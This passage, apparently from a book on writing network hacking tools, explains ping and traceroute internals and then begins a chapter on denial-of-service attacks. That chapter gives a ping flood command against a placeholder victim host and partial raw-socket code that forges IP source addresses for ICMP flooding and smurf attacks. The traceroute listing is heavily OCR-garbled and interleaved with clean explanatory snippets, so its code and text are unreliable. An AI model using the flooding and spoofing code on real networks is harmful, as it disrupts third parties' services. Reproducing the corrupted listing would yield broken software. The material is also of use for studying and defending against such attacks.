    gettimeofday((struct timeval *) icmp->icmp_data, NULL);

    /* Length is 8 bytes of ICMP header and 56 bytes of data */
    icmplen = 8 + 56;

    /* Checksum for the ICMP header and data */
    icmp->icmp_cksum = 0;
    icmp->icmp_cksum = in_cksum((unsigned short *) icmp, icmplen);

    if (sendto(sd, sendbuf, icmplen, 0,
               (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0) {
        perror("sendto() failed");
        exit(-1);
    }
}
/* ---------------------------------------------------------- */
/* Subtracting one timeval structure from another             */
/* ---------------------------------------------------------- */
void tv_sub(struct timeval *out, struct timeval *in)
{
    if ( (out->tv_usec -= in->tv_usec) < 0) {
        out->tv_sec--;
        out->tv_usec += 1000000;
    }
    out->tv_sec -= in->tv_sec;
}

/* ---------------------------------------------------------- */
/* The handler for the SIGALRM and SIGINT signals             */
/* ---------------------------------------------------------- */
void catcher(int signum)
{
    if (signum == SIGALRM) {
        pinger();
        return;
    } else if (signum == SIGINT) {
        printf("\n--- %s ping statistics ---\n", inet_ntoa(servaddr.sin_addr));
        printf("%d packets transmitted, ", nsent);
        printf("%d packets received, ", nreceived);
        if (nsent) {
            if (nreceived > nsent)
                printf("-- somebody's printing packets!");
            else
                printf("%d%% packet loss",
                       (int) (((nsent - nreceived) * 100) / nsent));
        }
        printf("\n");
        if (nreceived)
            printf("round-trip min/avg/max = %.3f/%.3f/%.3f ms\n",
                   tmin,
                   tsum / nreceived,
                   tmax);
        fflush(stdout);
        exit(-1);
    }
}
/* ---------------------------------------------------------- */
/* Calculating the checksum                                   */
/* ---------------------------------------------------------- */
unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    /* Adding all 2-byte words */
    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    /* If there is a byte left over, adding it to the sum */
    if (len == 1)
        sum += *(unsigned char *) addr;

    sum = (sum >> 16) + (sum & 0xFFFF);   /* Adding the carry */
    sum += (sum >> 16);                   /* Adding the carry again */
    result = ~sum;                        /* Inverting the result */
    return result;
}





Like ping, traceroute is a standard utility in any full-featured operating system. The Windows version of the utility is called tracert.

The function of the traceroute utility is to trace the route taken by packets to reach the 
specified host. Hackers use traceroute as a war utility for determining the topology of a net- 
work and the ways of penetrating it. In essence, traceroute can be used to perpetrate a pas- 
sive break-in. 

The creator of the utility is Van Jacobson, who wrote the first version of it for UNIX 
in 1988. 

The following is an example of starting the utility and the results of its execution:


# traceroute www.sklyaroff.ru
traceroute to www.sklyaroff.ru (194.135.22.233), 30 hops max, 38 byte packets
 1  212.220.221.251 (212.220.221.251)  159.038 ms  159.891 ms  140.623 ms
 2  212.220.221.254 (212.220.221.254)  148.533 ms  149.416 ms  151.226 ms
 3  uralcom-rtcomm-1l.urtc.ru (195.38.35.253)  160.017 ms  160.321 ms  141.133 ms
 4  193.47.87.217 (193.47.87.217)  137.544 ms  140.341 ms  159.953 ms
 5  * * *
 6  ebgl4.ebq24.f04.transtelecom.net (217.150.47.50)  150.363 ms  148.776 ms  140.048 ms
 7  Relcom-gw.transtelecom.net (217.150.39.129)  218.521 ms  189.156 ms  189.614 ms
 8  KIAE-16.relcom.net (193.124.254.169)  191.221 ms  191.360 ms  179.513 ms
 9  kiae-spider-l.relcom.net (194.58.41.10)  179.634 ms  189.361 ms  189.632 ms
10  194.135.22.233 (194.135.22.233)  191.155 ms  189.331 ms  199.275 ms

Currently, there are two versions of traceroute: one that uses a datagram socket to send UDP packets and one that uses a raw socket to send ICMP packets. Traditionally, UNIX-like operating systems, including Linux, implement the former version, and Windows implements the latter. UNIX traceroute, however, has the -I flag, which makes the utility send ICMP packets, that is, work like Windows tracert. Windows tracert, on the other hand, cannot be made to work like traceroute; that is, it cannot send UDP packets.

I consider implementing the datagram socket version of the utility first, and then the 
second version (with both versions, naturally, intended for execution on Linux systems). 
Note that the node being probed can block either UDP or ICMP packets, so a hacker may 
need both of these versions. 


5.1. Version 1: Using a Datagram Socket to Send UDP Packets


The source code for a custom traceroute utility is shown in Listing 5.1. I called it tracerudp.c to distinguish it from the standard system utility. The main difference between the standard and the custom versions is that the latter does not support command line parameters, of which the standard utility has more than 15.

The traceroute utility relies on the TTL field in the IP packet header (see Section 3.4.2), whose value limits the number of hops (routers) the datagram may pass through before it is discarded. Every router that forwards the datagram decrements the TTL value by 1. The router at which the TTL value reaches 0 discards the datagram and sends back an ICMP “time exceeded” message. This mechanism prevents packets from circulating endlessly on a network.

The first version of traceroute sends a series of UDP datagrams, incrementing the value of the TTL field for each successive hop (by default, up to 30 hops, with three probes per hop). The TTL value of the first datagram is set to 1. When the first UDP packet arrives at a router, the router decrements the TTL value by 1, making it 0, and replies with an ICMP “time exceeded” message. Upon receiving the reply, traceroute displays the address of the router. The TTL value of the next UDP packet sent is 2; it is decremented to 0 by the second router the packet encounters, which sends back an ICMP “time exceeded” message. UDP packets continue to be sent until the destination is reached or the maximum number of hops (30 by default) is exhausted. But how is the end host determined? The traceroute utility sends datagrams to a high port that, hopefully, is not in use on the given host; by convention, the destination ports start at 33,434. When a host receives a UDP datagram at an unused port, it returns an ICMP “port unreachable” message. This tells traceroute that the destination host has been reached, and it terminates execution.

Thus, the first version of traceroute works with three types of packets: UDP packets, 
ICMP “time exceeded” messages, and ICMP “port unreachable” messages. 
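The two kinds of ICMP replies are told apart by their type and code values: “time exceeded in transit” is type 11, code 0, and “port unreachable” is type 3, code 3. The sketch below is a hypothetical classify_icmp() that uses glibc's BSD-style constant names and borrows the return-value convention of the packet_ok() function described later in this section (-2 for an intermediate router, -1 for the destination).

```c
#define _DEFAULT_SOURCE 1          /* BSD-style ICMP constants in glibc */
#include <netinet/ip_icmp.h>

/* Hypothetical helper: -2 for "time exceeded in transit" (11/0),
   -1 for "port unreachable" (3/3), 0 for anything else. */
int classify_icmp(int type, int code)
{
    if (type == ICMP_TIMXCEED && code == ICMP_TIMXCEED_INTRANS)
        return -2;                     /* an intermediate router answered */
    if (type == ICMP_UNREACH && code == ICMP_UNREACH_PORT)
        return -1;                     /* the destination host answered */
    return 0;                          /* not a reply traceroute expects */
}
```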

Therefore, two types of sockets have to be created in a traceroute program: a datagram 
socket to send UDP packets and a raw socket to receive arriving ICMP messages. 

/* Creating a datagram socket to send UDP packets */
sendfd = socket(PF_INET, SOCK_DGRAM, 0);

/* Creating a raw socket for receiving ICMP messages */
recvfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
Only privileged users can create a raw socket; therefore, the standard Linux traceroute utility has the SUID bit set:

$ ls -la /usr/sbin/traceroute

-rwsr-xr-x 1 root root 168256 Dec 2 2000 /usr/sbin/traceroute

After the custom traceroute utility is compiled and built, it can likewise be given the SUID bit so that regular users can run it.

In the program itself, the original user rights are restored after a raw socket is created: 

setuid(getuid()); 


Because several instances of traceroute can be running on a machine at the same time, 
it is necessary to differentiate arriving ICMP messages, that is, to be able to tell whether an 
ICMP message is a reply to a datagram sent by this traceroute or to a datagram sent by some 
other traceroute. This is achieved by binding the UDP socket to a source port using the 
bind() function. A unique source port number is obtained by taking the 16 least significant 
bits of the current process’ PID and setting the most significant of them to 1. This port num- 
ber is automatically entered into the UDP header of each datagram sent: 

sport = (getpid() & 0xffff) | 0x8000;

sabind.sin_family = AF_INET;
sabind.sin_port = htons(sport);

if (bind(sendfd, (struct sockaddr *) &sabind, sizeof(sabind)) != 0)
    perror("bind() failed");
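The port computation on its own, as a sketch (traceroute_sport() is a hypothetical name):

```c
#include <stdint.h>
#include <sys/types.h>

/* Source port as described above: the 16 low-order bits of the PID
   with the most significant of them forced to 1, so the result always
   lies in the range 32768-65535. */
uint16_t traceroute_sport(pid_t pid)
{
    return (uint16_t) ((pid & 0xffff) | 0x8000);
}
```

For example, a process with PID 1234 (0x04d2) gets port 0x84d2, that is, 34002. Note that PIDs whose 15 low-order bits coincide map to the same port. If two such instances run at the same time, the second one's bind() fails, and the listing merely reports the error.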

Pursuant to RFC 792, both ICMP messages, time exceeded and port unreachable, return 
in their last field the Internet header and 64 data bits of the original datagram (see Fig. 5.1) 
that caused the error; that is, the UDP header of the original datagram is stored in this field. 
When it receives an ICMP message, the traceroute utility analyzes this field to determine the 
source port and, hence, the source process. 





[Figure: outer IP header (20-60 bytes; pointer ip, length hlen1), ICMP header (pointer icmp), then the IP header (20-60 bytes; pointer hip) and UDP header (pointer udp) of the UDP datagram that generated the ICMP error; icmplen covers the ICMP part]


Fig. 5.1. Headers, pointers, and lengths used in processing of ICMP errors 
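The pointer arithmetic of Fig. 5.1 can be expressed as follows. This is a hypothetical helper, not the listing's packet_ok(), which also handles timeouts and prints results. It assumes the buffer comes from the raw ICMP socket and therefore starts with the outer IP header; hlen2 is this sketch's name for the length of the quoted IP header.

```c
#define _DEFAULT_SOURCE 1          /* BSD-style struct ip / icmp / udphdr in glibc */
#include <stddef.h>
#include <stdint.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>

/* Hypothetical helper: if buf holds a "time exceeded" or "destination
   unreachable" message quoting a UDP datagram, return the quoted source
   port and store the quoted destination port in *dport (both in host
   byte order); otherwise return -1. */
int quoted_udp_ports(const unsigned char *buf, size_t len, int *dport)
{
    const struct ip *ip = (const struct ip *) buf;
    const struct icmp *icmp;
    const struct ip *hip;
    const struct udphdr *udp;
    size_t hlen1, hlen2;

    if (len < sizeof(struct ip))
        return -1;
    hlen1 = (size_t) ip->ip_hl << 2;              /* outer IP header */
    if (len < hlen1 + 8 + sizeof(struct ip))      /* ICMP header + quoted IP */
        return -1;

    icmp = (const struct icmp *) (buf + hlen1);
    if (icmp->icmp_type != ICMP_TIMXCEED && icmp->icmp_type != ICMP_UNREACH)
        return -1;

    hip = (const struct ip *) (buf + hlen1 + 8);  /* quoted IP header */
    hlen2 = (size_t) hip->ip_hl << 2;
    if (hip->ip_p != IPPROTO_UDP || len < hlen1 + 8 + hlen2 + 8)
        return -1;                                /* need the 64 quoted bits */

    udp = (const struct udphdr *) (buf + hlen1 + 8 + hlen2);
    *dport = ntohs(udp->uh_dport);
    return ntohs(udp->uh_sport);
}
```

traceroute would then compare the returned source port with its own sport, and the destination port with the port used for the probe.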
The main traceroute operations are carried out in a doubly nested for loop. The outer loop generates TTL values from 1 to max_ttl, which is 30. The inner loop sends three probe packets (UDP datagrams) to the destination:

for (ttl = 1; ttl <= max_ttl && done == 0; ttl++) {
    ...
    for (probe = 0; probe < nprobes; probe++) {
        ...
    }
}


A new TTL value in the IP header is set using the setsockopt() function with the IP_TTL option:

setsockopt(sendfd, SOL_IP, IP_TTL, &ttl, sizeof(int));

If the IP_TTL option did not exist, setting a new TTL value would require constructing a custom IP header, using the IP_HDRINCL socket option.
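Here is a small sketch of setting and reading back the TTL on an ordinary UDP socket, which needs no privileges. set_ttl() and get_ttl() are hypothetical names. The sketch passes IPPROTO_IP as the level, which is the portable spelling; the text uses SOL_IP, which on Linux has the same value (0).

```c
#include <netinet/in.h>
#include <sys/socket.h>

/* Hypothetical helper: set the TTL of outgoing datagrams on fd. */
int set_ttl(int fd, int ttl)
{
    return setsockopt(fd, IPPROTO_IP, IP_TTL, &ttl, sizeof(ttl));
}

/* Hypothetical helper: read the current TTL back, or -1 on error. */
int get_ttl(int fd)
{
    int ttl = -1;
    socklen_t len = sizeof(ttl);

    if (getsockopt(fd, IPPROTO_IP, IP_TTL, &ttl, &len) < 0)
        return -1;
    return ttl;
}
```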

Every time the outer loop is executed, the salast socket address structure is zeroed:

bzero(&salast, sizeof(salast));

In the inner loop, the IP address field of this structure (salast.sin_addr) is compared with the IP address in the structure filled in by the recvfrom() function (sarecv.sin_addr). If the two differ, the IP address from the new structure is displayed and then copied into salast.sin_addr. This way, for each TTL the program outputs the IP address corresponding to the first probe packet; if the IP address changes for the same TTL (i.e., the route changes while the probes are in transit), the new IP address is displayed as well.
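The salast comparison reduces to a few lines. In this hypothetical addr_changed() helper, a zeroed salast (address 0.0.0.0) never matches the address of a real router, so the first reply for each TTL is always printed.

```c
#include <netinet/in.h>

/* Hypothetical helper: returns 1 and remembers cur if it differs from
   *last (the caller then prints it), or 0 if the address is the same. */
int addr_changed(struct in_addr *last, struct in_addr cur)
{
    if (last->s_addr == cur.s_addr)
        return 0;
    *last = cur;
    return 1;
}
```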

Before the next probing packet is sent out, the destination port is changed (incremented 
by 1) in the nested loop: 

sasend.sin_port = htons(dport + seq);

This is done to send each of the three probing packets to a different port, thus increasing 
the chances of hitting a closed port. 

The recvfrom() function, used to receive packets, is called in the packet_ok() function, which also parses the header fields of a received packet. The packet_ok() function returns -3 when the waiting time expires, -2 when the ICMP “time exceeded in transit” message is received, and -1 when the ICMP “port unreachable” message is received. For these return values, the calling function outputs, respectively, an asterisk, the address of the intermediate router, or the address of the destination node. In the last case, traceroute terminates execution.

The custom traceroute program waits a maximum of 4 seconds for incoming packets. If no packet arrives at the receiving socket (recvfd) during this time, then, as already mentioned, -3 is returned to the calling function and an asterisk is displayed. The wait is implemented using the select() function and the FD_ZERO, FD_SET, and FD_ISSET macros. You can learn more about them from the man pages and related literature.
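A minimal sketch of such a wait follows, using a hypothetical wait_readable() helper. The timeout structure is filled in on every call because select() may modify it (Linux stores the remaining time there). The <unistd.h> header is not needed by the function itself but is included for the pipe() and write() calls used to try it out.

```c
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/* Hypothetical helper: wait up to `seconds` for fd to become readable.
   Returns 1 if readable, 0 on timeout, -1 on error (errno from select()). */
int wait_readable(int fd, int seconds)
{
    fd_set fds;
    struct timeval tv;
    int n;

    FD_ZERO(&fds);
    FD_SET(fd, &fds);
    tv.tv_sec = seconds;               /* reset on every call */
    tv.tv_usec = 0;

    n = select(fd + 1, &fds, NULL, NULL, &tv);
    if (n < 0)
        return -1;
    return (n > 0 && FD_ISSET(fd, &fds)) ? 1 : 0;
}
```

In the custom traceroute, the equivalent call would be wait_readable(recvfd, 4), with a return value of 0 corresponding to packet_ok() returning -3.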

The source code for the custom traceroute utility can be found in the \PART II\Chapter 5 folder on the accompanying CD-ROM.
Listing 5.1. The source code for the custom traceroute utility (tracerudp.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>            /* bzero() */
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <sys/time.h>
#include <unistd.h>

#define BUFSIZE 1500

/* UDP data structure */
struct outdata {
    int outdata_seq;              /* Sequence number */
    int outdata_ttl;              /* TTL value */
    struct timeval outdata_tv;    /* Packet transmittal time */
};

char recvbuf[BUFSIZE];
char sendbuf[BUFSIZE];

int sendfd;     /* Descriptor of the socket for sending UDP datagrams */
int recvfd;     /* Descriptor of the raw socket for receiving
                   ICMP messages */

/* The sockaddr_in structure for sending a packet */
struct sockaddr_in sasend;

/* The sockaddr_in structure for binding the source port */
struct sockaddr_in sabind;

/* The sockaddr_in structure for receiving a packet */
struct sockaddr_in sarecv;

/* The last sockaddr_in structure for receiving a packet */
struct sockaddr_in salast;

int sport;                    /* Source port */
int ttl;
int probe;
int max_ttl = 30;             /* Maximum value for the TTL field */
int nprobes = 3;              /* Number of probing packets */
int dport = 32768 + 666;      /* First destination port (33434) */

/* Length of the UDP data field */
int datalen = sizeof(struct outdata);

/* Function prototypes */
void tv_sub(struct timeval *, struct timeval *);
int packet_ok(int, struct timeval *);

/* ---------------------------------------------------------- */
/* The main() function                                        */
/* ---------------------------------------------------------- */
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int main(int argc, char *argv[]) 
{ 

int seq; 

int code; 

int done; 

double rtt; 

struct hostent *hp; 

struct outdata *outdata; 

Struct timeval tvrecy; 


if (argc != 2) | 
fprintf(stderr, "Usage: %5 <hostname>\n", argv[0]); 
exit(-l); 


} 


if ( (hp = gethostbyname(argv[1])) == NULL) { 
herror ("gethostbyname() failed"); 
exit(-1); 


if ( (recvfd = socket (PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) [{ 
perror("socket() failed"); 
exit (-1); 

} 


/* Restoring the initial rights */ 
setuid(getuid()); 


if ( (sendfd = socket (PF_INET, SOCK _DGRAM, 0)) < 0) { 
perror("socket() failed"); 
exit(<1l); 

} 


sport = (getpid() & Oxffff) | Oxd000; /* The UDP source port number */ 


bzero(&sasend, sizeof (sasend)); 
sasend.sin family = AF INET; 
sasend.sin_addr= *({struct in_addr *) hp->h_addr); 


Sabind.sin family = AF_INET; 

sabind.sin port = htons(sport); 

if (bind(sendfd, {struct sockaddr *)&sabind, sizeof(sabind)} != 0) 
perror("bind({) failed"); 


seq = 0; 

done = 0; 

for (ttl = 1; ttl <= max ttl && done == 0; ttl++) { 
setsockopt{sendfd, SOL IP, IP TTL, &ttl, sizeof ({int)); 
bzerolésalast, sizeof(salast)); 


printt("t2d ™“, ttl); 
fFflush(stdout); 


for (probe = 0; probe < nprobes; probet++) { 
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outdata = (Struct outdata *)sendbuf; 
outdata->outdata_ seq = ++seq; 
outdata->outdata ttl = ttl; 

gettimeofday (&outdata->outdata_tv, NULL); 


Sasend.sin_ port = htons(dport + seq); 

if ({sendto(sendfd, sendbuf, datalen, 0, {struct sockaddr *)4sasend, 
perror("sendto() failed"); 
exit (=-1); 

} 

if ( (code = packet ok(seqg, &tvrecv)) == -3) 


printf(" *"); /* The wait time expired; no answer. */ 
else |{ 


Sizeof (sasend)) < 0) 


if (memoemp(&sarecv.sin_addr, 4&salast.sin_addr, sizeof (sarecv.sin_addr)} != 0) { 
if ( (hp = gethostbyaddr(&sarecv.sin_addr, sizeof(sarecv.sin_ addr), 
sarecy.sin_family)} != 0} 


} 


printf(" $s (%s)", inet ntoa(sarecv.sin addr), hp->h name); 


else 
printft(" $s", inet _ntoa(sarecv,.sin addr) ); 


memcpy (&salast.sin_addr, &sarecv.sin_addr, sizeof (salast.sin_addr})}; 


I 


tv_sub(é&tvrecv, &Soutdata->outdata tv); 
rtt = tvrecv.tv_sec * 1000.0 + tvrecv.tv_usec / 1000.0; 
printf£(" %.3£ ms", rtt); 


if {code == -1) 
++done; 


} 


fflush {stdout}; 


printf ("\n"); 


=—_-—--— — 


return OQ; 
Sie en og a ter ee So ee ee ee ee ee 
Parsing a received packet mi 
af 
' The function returns: arf 
-3 when the wait time expires. a 
-2 when an ICMP "time exceeded in transit” message is received; */ 
the program continues executing. */ 
-1 when an ICMP "port unreachable" message is received; “sf 


the program terminates execution. f/f 
ea pes se ee ee ee ee ee ed See ee ee Ss eee ee a ee * f 
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int packet _ok(int seq, struct timeval *tv) 
{ 
int n; 
int len; 
int hlenl; 
int hlen2; 
struct ip *ip; 
struct ip *hip; 
struct icmp *icmp; 
struct udphdr *udp; 
fd set fds; 
struct timeval wait; 


Walt.tv_sec = 4; /* Waiting for a reply for 4 seconds, the longest */ 
Wait.tv_usec = 0; 


for {:7) f 

len = sizeé6of (Sarecy) ; 
FD 2ERO(&fds) ; 
FD SET (recvfd, éfds); 


if (select (recvfd + 1, &fds, NULL, NULL, &wait) > 0} 

n = recvfrom(recvfd, recvbuf, sizeof({recvbuf), 0, (struct sockaddr*) 4sarecv, 
else if (!FD_ISSET(recvfd, é&fds)) 

return (-3); 
else 

perror("recvfrom() failed"); 


gettimeocfday (tv, NULL); 


ip = (struct ip *) recvbut; /* Start of the IP header */ 
hlenl = ip->ip hl << 2; /* Length of the IP header */ 


/* Start of the ICMP header */ 

icmp = (struct icmp *) (recvbuf + hlenl); 

/* Start of the saved IP header */ 

hip = (struct ip *) (recvbuf + hlenl + 8); 

/* Length of the saved IP header */ 

hlen2 = hip->ip hl << 2; 

/* Start of the saved UDP header */ 

udp = (struct udphdr *) (recvbuf + hlenl + ? + hlen2); 


if ({icmp->icmp type == ICMP _TIMXCEED && 
icmp->icmp code == ICMP TIMXCEED INTRANS) { 
if (hip->ip_p == IPPROTO_UDP && 
udp->source == htons(sport) && 
yudp-sdest == htons(dport + seq) ) 
return (-2}; 
} 


if (icmp->icmp type == ICMP _UNREACH) { 
if (hip->ip p == IPPROTO UDP && 
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udp->source == htons (sport) &4 
udp->dest == htons(dport + seq)) { 
if (icmp->icemp code == ICMP UNREACH PORT) 


return (-1); 
} 
i 
} 
} 
[Pim eee teeses os 
/* Subtracting one timeval structure from another */ 
[Pt eeeeeeeeeeeeeeee=== ------ [Toles enlaslontentante lo lententeslectesientenleieateienter * 


void tv_sub(struct timeval *out, struct timeval *in} 
if { (out->tv usec -= in->tv_usec) < 0) { 
out->tv sec--; 
out->tv_usec += 1000000 
} 
out—->tyv_ sec -= in->tv_sec; 
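The round-trip time printed by main() is the difference between the moment the reply arrived and the time stored in the probe's outdata_tv field. A minimal sketch of that calculation; rtt_ms() is a hypothetical wrapper, and tv_sub() follows the listing:

```c
#include <sys/time.h>

/* Same logic as tv_sub() in Listing 5.1: out = out - in, borrowing one
   second when the microsecond field goes negative. */
void tv_sub(struct timeval *out, const struct timeval *in)
{
    if ((out->tv_usec -= in->tv_usec) < 0) {
        out->tv_sec--;
        out->tv_usec += 1000000;
    }
    out->tv_sec -= in->tv_sec;
}

/* Hypothetical wrapper: round-trip time in milliseconds, computed with the
   same formula as main(). `arrived` is a copy, so the caller's value is kept. */
double rtt_ms(struct timeval arrived, const struct timeval *sent)
{
    tv_sub(&arrived, sent);
    return arrived.tv_sec * 1000.0 + arrived.tv_usec / 1000.0;
}
```

For example, a probe sent at 1.900000 s and answered at 2.000100 s gives a borrow in tv_sub() and a round-trip time of 100.1 ms.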





5.2. Version 2: Using a Raw Socket to Send ICMP Packets


The only difference between the second and the first versions of the custom traceroute
program is that the second version sends ICMP echo request messages instead of UDP datagrams.
As in the first version, the TTL value in the IP packet header is sequentially incremented by 1 
for each probe. The intermediate routers are supposed to return the ICMP “time exceeded” 
message, and the destination host is supposed to return an echo reply message. 

Thus, the second version does not require creating two types of sockets; only a single 
ICMP socket is used for sending and receiving ICMP messages: 

/* Creating a raw socket for sending and receiving ICMP messages */ 

sd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);

This version does not use network ports, because ICMP, unlike UDP, has no port numbers:
ICMP messages are handled by the IP subsystem itself, not by an individual service. ICMP
messages belonging to a particular traceroute instance are identified using the current
process's PID.
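A sketch of how an ICMP echo request can carry an identifier and how a reply is matched against it. The helper names are hypothetical, the header is filled byte by byte instead of through struct icmp, and the identifier is passed in explicitly; in a real program it would typically be getpid() & 0xffff. The code in tracericmp.c may differ.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

/* RFC 1071 Internet checksum over big-endian 16-bit words; the result is in
   host byte order, so it is stored with htons(). */
static uint16_t cksum(const unsigned char *p, size_t len)
{
    uint32_t sum = 0;

    while (len > 1) {
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)p[0] << 8;          /* pad the odd byte with a zero */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);  /* fold the carries */
    return (uint16_t)~sum;
}

/* Hypothetical helper: build an echo request (8-byte header plus datalen
   payload bytes) in buf and return the ICMP message length. */
size_t build_echo_request(unsigned char *buf, size_t datalen,
                          uint16_t id, uint16_t seq)
{
    uint16_t v;

    buf[0] = 8;                        /* type 8: echo request */
    buf[1] = 0;                        /* code 0 */
    buf[2] = buf[3] = 0;               /* checksum zeroed before computing */
    v = htons(id);
    memcpy(buf + 4, &v, 2);            /* identifier, e.g. derived from the PID */
    v = htons(seq);
    memcpy(buf + 6, &v, 2);            /* sequence number */
    memset(buf + 8, 0xa5, datalen);    /* arbitrary payload pattern */

    v = htons(cksum(buf, 8 + datalen));
    memcpy(buf + 2, &v, 2);
    return 8 + datalen;
}

/* Hypothetical helper: does this ICMP message (starting at the ICMP header)
   answer one of our requests? Echo replies carry the identifier back. */
int is_echo_reply_for(const unsigned char *icmp, uint16_t id)
{
    return icmp[0] == 0 && icmp[1] == 0 &&        /* type 0: echo reply */
           (uint16_t)((icmp[4] << 8) | icmp[5]) == id;
}
```

Because a raw ICMP socket receives a copy of every ICMP message arriving at the host, a check like is_echo_reply_for() is what keeps one traceroute (or ping) instance from reporting another instance's replies.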

The source code for the second version of the custom traceroute utility can be found
in the \PART II\Chapter 5 directory on the accompanying CD-ROM. The file's name is
tracericmp.c. You may notice that it shares many features with the ping utility. If you grasped 
the ping utility and the first version of the custom traceroute program, you should have no 
questions concerning its operation. 





Chapter 6: DoS Attack and IP Spoofing Utilities








Denial-of-service (DoS) attacks aim to degrade the performance of, or block access to,
a network or a computer and its resources. There are four main types of DoS attacks:

- Attacks that exhaust a network's resources
- Attacks that exhaust a host's resources (monopolizing the memory, CPU, disk quotas, etc.)
- Attacks that exploit software bugs to crash a host or induce it to operate erratically
- Attacks that modify the system's configuration or state to block data transmission, break
  the connection, or cause drastic performance loss


In addition, DoS attacks can be classified as local or remote. Local attacks are carried out 
directly at the attacked host, and remote attacks are carried out over a network. In this book,
I only consider how to program utilities for carrying out remote DoS attacks, because local DoS 
attacks are rare and of little interest; moreover, perpetrating a local DoS attack requires gaining 
physical access to the vulnerable host, which is not a prerequisite for a remote DoS attack. 

As a rule, remote DoS attacks are accompanied by IP spoofing, that is, faking the source
address in sent packets to hide the address of the host from which the attack is being waged.
Therefore, when considering DoS attack programs, I also consider implementing IP spoofing.

This chapter considers only the first three of the previously listed DoS attack types. The fourth
type is implicitly considered in Chapter 9, when active sniffing is discussed. This is because, in
addition to intercepting traffic, active sniffing methods can cause denial of service, making it
impossible to transmit data or breaking an existing connection between hosts. Simply pulling
the plug out of the wall socket, that is, cutting the power to a device, can also be placed in the
last DoS attack category.
The first two types of DoS attacks listed previously are called flooding, because they gradually
flood a network or a host with requests for its resources, eventually hogging all or most
resources and leaving none for legitimate requests.

Not all known DoS attacks can be clearly placed into a specific category. For example,
the UDP storm attack fits all three of the DoS attack types considered in this chapter. Therefore,
the category under which a specific DoS attack is discussed below is no more than a convention.


6.1. Attacks That Exhaust Network Resources 


6.1.1. ICMP Flooding and Smurf 


An ICMP flooding attack exhausts the network’s resources by sending it a large number of 
ICMP echo request messages. Therefore, a program to implement this type of DoS attack is 
not that different from the ping utility, which was considered in Chapter 4. The main differ- 
ence is that it only sends echo requests; it does not have to worry about receiving replies to 
them. In addition, no delay is necessary between successive packets; on the contrary, packets 
must be sent as rapidly as possible. For a DoS attack to be more efficient, the size of packets 
can be increased. The standard ping utility can be used to carry out an ICMP flooding 
attack by running it with the -f and -s parameters. The former tells the utility to send echo 
requests as rapidly as possible, and the latter is used to increase the size of the sent packets. 
For example, the following command sends an uninterrupted stream of 3-KB packets to the 
victim.example.com host: 


# ping -f -s 3072 victim.example.com


After each packet it sends, the ping utility outputs a dot on the screen, which is deleted
when the corresponding echo reply is received.

The standard ping utility, however, has no means of changing the sender's address. This
shortcoming is fixed in a custom ping utility (see Listing 6.1 later in this section). This utility
can also be used to carry out the smurf DoS attack. In a smurf attack, a perpetrator sends
a broadcast ICMP echo request on a local network and gives the victim's address as that of the
request's originator. This results in all computers on the network sending an echo reply
message to the victim's address, thus flooding its resources.

To implement IP spoofing, the utility fills all fields of the IP header itself, including the
source IP address field, which receives a fake address (see Section 3.4.2). To build a custom
packet, a raw socket must be created:

sd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);


I used the IPPROTO_RAW constant, but the IPPROTO_ICMP constant can also be used. Which
of these constants you use is of no importance, because the utility only sends ICMP packets
and does not receive them (see Section 3.5.2).

For the raw socket, the IP_HDRINCL option is set using the setsockopt() function.
This prevents the TCP/IP stack from generating IP headers itself.
To be able to send broadcast messages, which is necessary for implementing a smurf attack,
another call to the setsockopt() function sets the SO_BROADCAST socket option.

A buffer is defined for outgoing packets as follows: 

char sendbuf[sizeof(struct iphdr) + sizeof(struct icmp) + 1400];


That is, the size of each outgoing packet is the total length of the IP and ICMP headers
plus 1,400 bytes. The definitions of the IP and ICMP header structures are taken from the
netinet/ip.h and netinet/ip_icmp.h header files, respectively. The only reason I use the value
of 1,400 is to increase the size of the outgoing packet. This part of the buffer is not
initialized, so it is sent with whatever garbage data it happens to contain.

The size of outgoing packets could be set to 65,535 bytes. (This limit is set by the 16-bit total
length field of the IP header, as shown in Fig. 3.5.) But then it would become necessary to
provide the program with a packet fragmentation algorithm in case the network's MTU is smaller
than the size of the outgoing packet. For example, the Ethernet MTU is 1,500 bytes. Sending a
longer packet to an Ethernet network makes the sending function fail, with the perror()
function outputting the "message too long" message.

The ICMP header is 8 bytes long, and the IP header is 20 to 60 bytes long; therefore, the
size of an outgoing packet will be 1,468 bytes or less. Most networks will let a packet of this
size through. Note that if the task of filling the IP header were left to the IP subsystem, that is,
if the IP_HDRINCL socket option were not set, packets up to 65,535 bytes could be sent, because
the IP subsystem would handle fragmentation itself.

Thus, it makes no sense to send overly large packets; they would be fragmented anyway.¹
So 1,400 bytes is the optimal packet size.

Next, you have to define pointers to the structures of the headers allocated in the sendbuf
buffer. This can be done as follows:

struct iphdr *ip_hdr = (struct iphdr *)sendbuf;
struct icmp *icmp_hdr = (struct icmp *)(sendbuf + sizeof(struct iphdr));

Then the IP and ICMP header fields are filled directly in the buffer:

/* Filling the IP header */
ip_hdr->ihl = 5;
ip_hdr->version = 4;
ip_hdr->tos = 0;
ip_hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmp) + 1400);
ip_hdr->id = 0;
ip_hdr->frag_off = 0;
ip_hdr->ttl = 255;
ip_hdr->protocol = IPPROTO_ICMP;
ip_hdr->saddr = srcaddr;
ip_hdr->daddr = dstaddr;
/* The checksum is calculated last, over the completed header */
ip_hdr->check = 0;
ip_hdr->check = in_cksum((unsigned short *)ip_hdr, sizeof(struct iphdr));

/* Filling the ICMP header */
icmp_hdr->icmp_type = ICMP_ECHO;
icmp_hdr->icmp_code = 0;
